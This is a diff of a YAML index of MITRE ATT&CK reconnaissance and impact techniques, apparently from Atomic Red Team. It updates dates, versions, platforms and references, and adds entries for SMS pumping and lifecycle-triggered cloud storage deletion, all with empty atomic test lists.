         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Diego Sappa, Securonix
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
 
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+      created: '2020-10-02T16:54:23.193Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1595/001
+        external_id: T1595.001
+      - source_name: Botnet Scan
+        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+          a Botnet. Retrieved October 20, 2020.
+        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1590.001:
     technique:
@@ -57921,7 +58608,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.005:
     technique:
@@ -57942,7 +58628,7 @@ reconnaissance:
       - source_name: Shodan
         url: https://shodan.io
         description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:49.260Z'
       name: Scan Databases
       description: |-
         Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
@@ -57958,8 +58644,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.001:
     technique:
@@ -57985,7 +58669,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.025Z'
       name: Determine Physical Locations
       description: |-
         Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -58001,8 +58685,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.001:
     technique:
@@ -58026,7 +58708,7 @@ reconnaissance:
         url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
         description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
           Pad For Phishing Attacks. Retrieved October 20, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:43:12.843Z'
       name: Spearphishing Service
       description: |-
         Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -58048,13 +58730,11 @@ reconnaissance:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 impact:
   T1561.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:32:05.064Z'
       name: Disk Structure Wipe
       description: "Adversaries may corrupt or wipe the disk data structures on a
         hard drive necessary to boot a system; targeting specific critical systems
@@ -58146,13 +58826,12 @@ impact:
         url: https://www.symantec.com/connect/blogs/shamoon-attacks
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1498.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:54:49.943Z'
       name: Direct Network Flood
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -58161,7 +58840,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
@@ -58178,17 +58856,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
@@ -58213,7 +58886,8 @@ impact:
         url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491.002:
     technique:
@@ -58251,7 +58925,7 @@ impact:
         description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
           Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
           How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:37.539Z'
       name: External Defacement
       description: 'An adversary may deface systems external to an organization in
         an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -58285,12 +58959,10 @@ impact:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_impact_type:
       - Integrity
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1499.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:51.289Z'
       name: OS Exhaustion Flood
       description: |-
         Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -58355,42 +59027,127 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
-  T1499.003:
+  T1485.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
+      modified: '2024-10-16T21:27:02.481Z'
+      name: Lifecycle-Triggered Deletion
+      description: "Adversaries may modify the lifecycle policies of a cloud storage
+        bucket to destroy all objects stored within.  \n\nCloud storage buckets often
+        allow users to set lifecycle policies to automate the migration, archival,
+        or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+        GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+        has sufficient permissions to modify these policies, they may be able to delete
+        all objects at once. \n\nFor example, in AWS environments, an adversary with
+        the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+        API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+        in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+        to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+        adversaries may also perform this action on buckets storing cloud logs for
+        [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+        Datadog S3 Lifecycle CloudTrail Logs)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Storage: Cloud Storage Modification'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+      created: '2024-09-25T13:16:14.166Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1485/001
+        external_id: T1485.001
+      - source_name: AWS Storage Lifecycles
+        description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+          25, 2024.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+      - source_name: GCP Storage Lifecycles
+        description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+          September 25, 2024.
+        url: https://cloud.google.com/storage/docs/lifecycle
+      - source_name: Azure Storage Lifecycles
+        description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+          policy. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+      - source_name: Palo Alto Cloud Ransomware
+        description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+          in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+          2024.'
+        url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+      - source_name: Datadog S3 Lifecycle CloudTrail Logs
+        description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+          S3 Lifecycle Rule. Retrieved September 25, 2024.
+        url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.003:
+    technique:
+      modified: '2024-10-16T17:45:14.210Z'
+      name: SMS Pumping
+      description: |-
+        Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+        Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
       type: attack-pattern
-      created: '2020-02-20T15:35:00.025Z'
+      id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+      created: '2024-09-25T13:53:19.586Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1499.003
-        url: https://attack.mitre.org/techniques/T1499/003
-      - source_name: Arbor AnnualDoSreport Jan 2018
-        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
-          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
-          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
-          Infrastructure Security Report. Retrieved April 22, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1496/003
+        external_id: T1496.003
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Twilio SMS Pumping
+        description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+          Stop It. Retrieved September 25, 2024.
+        url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+      - source_name: Twilio SMS Pumping Fraud
+        description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+          25, 2024.
+        url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1499.003:
+    technique:
+      modified: '2024-10-15T15:41:49.168Z'
       name: Application Exhaustion Flood
       description: 'Adversaries may target resource intensive features of applications
         to cause a denial of service (DoS), denying availability to those applications.
@@ -58401,13 +59158,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
 
         In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -58415,12 +59179,33 @@ impact:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      created: '2020-02-20T15:35:00.025Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1499/003
+        external_id: T1499.003
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: Arbor AnnualDoSreport Jan 2018
+        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+          Infrastructure Security Report. Retrieved April 22, 2019.
+        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1561:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-20T18:16:41.942Z'
       name: Disk Wipe
       description: |-
         Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
@@ -58481,109 +59266,79 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1565.001:
     technique:
+      modified: '2024-08-26T16:33:33.982Z'
+      name: Stored Data Manipulation
+      description: |-
+        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: Where applicable, inspect important file hashes, locations,
+        and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      - 'File: File Creation'
+      - 'File: File Deletion'
+      x_mitre_impact_type:
+      - Integrity
       type: attack-pattern
       id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
       created: '2020-03-02T14:22:24.410Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.001
         url: https://attack.mitre.org/techniques/T1565/001
+        external_id: T1565.001
       - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
         description: Department of Justice. (2018, September 6). Criminal Complaint
           - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
       - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
         description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
           November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
-        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Stored Data Manipulation
-      x_mitre_detection: Where applicable, inspect important file hashes, locations,
-        and modifications for suspicious/unexpected values.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'File: File Modification'
-      - 'File: File Creation'
-      - 'File: File Deletion'
-      x_mitre_impact_type:
-      - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1489:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
-      created: '2019-03-29T19:00:55.901Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1489
-        url: https://attack.mitre.org/techniques/T1489
-      - source_name: SecureWorks WannaCry Analysis
-        url: https://www.secureworks.com/research/wcry-ransomware-analysis
-        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
-          Analysis. Retrieved March 26, 2019.
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Novetta Blockbuster
-        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
-        description: 'Novetta Threat Research Group. (2016, February 24). Operation
-          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
-          25, 2016.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-12T15:57:27.380Z'
+      name: Service Stop
       description: "Adversaries may stop or disable services on a system to render
         those services unavailable to legitimate users. Stopping critical services
         or processes can inhibit or stop response to an incident or aid in the adversary's
         overall objectives to cause damage to the environment.(Citation: Talos Olympic
         Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
         this by disabling individual services of high importance to an organization,
-        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible
-        (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
-        many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible.(Citation:
+        Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+        all services to render systems unusable.(Citation: Talos Olympic Destroyer
         2018) Services or processes may not allow for modification of their data stores
         while running. Adversaries may stop services or processes in order to conduct
         [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
         for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
         of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Service Stop
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
 
@@ -58592,10 +59347,14 @@ impact:
         Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
 
         Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, <code>ChangeServiceConfigW</code> may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Process: Process Termination'
@@ -58606,39 +59365,37 @@ impact:
       - 'Service: Service Metadata'
       x_mitre_impact_type:
       - Availability
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+      created: '2019-03-29T19:00:55.901Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1489
+        external_id: T1489
+      - source_name: SecureWorks WannaCry Analysis
+        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+          Analysis. Retrieved March 26, 2019.
+        url: https://www.secureworks.com/research/wcry-ransomware-analysis
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Novetta Blockbuster
+        description: 'Novetta Threat Research Group. (2016, February 24). Operation
+          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+          25, 2016.'
+        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1489
     atomic_tests: []
   T1499.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
-      type: attack-pattern
-      created: '2020-02-20T15:37:27.052Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1499.004
-        url: https://attack.mitre.org/techniques/T1499/004
-      - source_name: Sucuri BIND9 August 2015
-        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
-        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
-          in the Wild. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T15:42:23.001Z'
       name: Application or System Exploitation
       description: "Adversaries may exploit software vulnerabilities that can cause
         an application or system to crash and deny availability to users. (Citation:
@@ -58656,13 +59413,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Attacks targeting web applications may generate logs in the
         web server, application server, and/or database server that can be used to
         identify the type of attack. Externally monitor the availability of services
         that may be targeted by an Endpoint DoS.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
